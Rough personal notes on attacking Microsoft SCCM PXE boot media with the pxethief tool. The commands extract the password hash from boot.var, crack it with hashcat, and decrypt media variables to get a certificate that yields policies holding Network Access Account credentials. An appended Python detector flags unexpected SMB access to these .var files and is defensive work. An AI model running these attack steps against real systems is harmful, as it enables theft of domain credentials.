
pxethief

Note: Notes below are pretty rough.

Reminder to self: this runs best on Windows!

Install

Get the Python installer from python.org (the 64-bit installer)

pip install -r requirements.txt

I'm having this issue.

Identify the hash of the password that was used to encrypt the variables

pxethief.py 5 boot.var

Note: boot.var is a file you might find in the \\SCCMSERVER\REMINST\SMSTEMP folder

Crack the extracted hash

I found it easier to use the hashcat-6.2.6-SCCM version of hashcat, and then use this syntax:

hashcat-6.2.6-SCCM.exe -m 19850 hash.txt bigbadwordlist.txt

Decrypt and retrieve contents of the media variables file (if cracking was successful)

pxethief.py 3 somevariablesfile.var YOUR-CRACKED-PASSWORD-GOES-HERE

At this point you should be able to get a certificate that will be used to request SCCM policies and task sequences, which may contain the NAA (Network Access Account) or other creds.

Note: I had a heck of a time getting this attack to work, but I opened a GitHub issue and then eventually did figure it out!
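
A defensive counterpart to the boot.var note above, as an added example that is not part of the original notes or of pxethief: it filters Windows Security event 5145 (detailed file share auditing) records for access to .var files under REMINST\SMSTEMP from sources outside an allowlist. The sample events, user names, addresses and the allowlist are constructed, and it assumes file share auditing is enabled on the server and that only the site server subnet should touch these files over SMB.

```python
import ipaddress

# Constructed records using field names from Windows Security event 5145
# (detailed file share auditing). Users, addresses and file names are made up.
SAMPLE_EVENTS = [
    {"EventID": 5145, "ShareName": r"\\*\REMINST", "SubjectUserName": "jdoe",
     "IpAddress": "10.0.5.23", "RelativeTargetName": r"SMSTemp\example.boot.var"},
    {"EventID": 5145, "ShareName": r"\\*\REMINST", "SubjectUserName": "svc-sccm",
     "IpAddress": "10.0.1.10", "RelativeTargetName": r"SMSTemp\example.boot.var"},
    {"EventID": 5145, "ShareName": r"\\*\REMINST", "SubjectUserName": "jdoe",
     "IpAddress": "10.0.5.23", "RelativeTargetName": r"SMSTemp\example.boot.bcd"},
    {"EventID": 5145, "ShareName": r"\\*\Public", "SubjectUserName": "jdoe",
     "IpAddress": "10.0.5.23", "RelativeTargetName": r"SMSTemp\notes.var"},
    {"EventID": 5145, "ShareName": r"\\*\REMINST", "SubjectUserName": "asmith",
     "IpAddress": "-", "RelativeTargetName": r"smstemp\OTHER.VAR"},
]

# Assumption: only the site server subnet should read these files over SMB.
ALLOWED_NETWORKS = ["10.0.1.0/24"]


def is_media_var_access(event):
    """True for a 5145 record that touches a .var file under REMINST\\SMSTEMP."""
    if event.get("EventID") != 5145:
        return False
    share = event.get("ShareName", "").rstrip("\\").rsplit("\\", 1)[-1].lower()
    parts = event.get("RelativeTargetName", "").lower().split("\\")
    return share == "reminst" and "smstemp" in parts[:-1] and parts[-1].endswith(".var")


def unexpected_var_access(events, allowed_networks):
    """Return (user, source, path) for matching accesses from outside the allowlist."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    hits = []
    for ev in events:
        if not is_media_var_access(ev):
            continue
        try:
            src = ipaddress.ip_address(ev.get("IpAddress", ""))
            allowed = any(src in net for net in nets)
        except ValueError:
            allowed = False  # unparseable source: report it rather than drop it
        if not allowed:
            hits.append((ev.get("SubjectUserName"), ev.get("IpAddress"),
                         ev.get("RelativeTargetName")))
    return hits


if __name__ == "__main__":
    for hit in unexpected_var_access(SAMPLE_EVENTS, ALLOWED_NETWORKS):
        print("unexpected media variable file access:", hit)
```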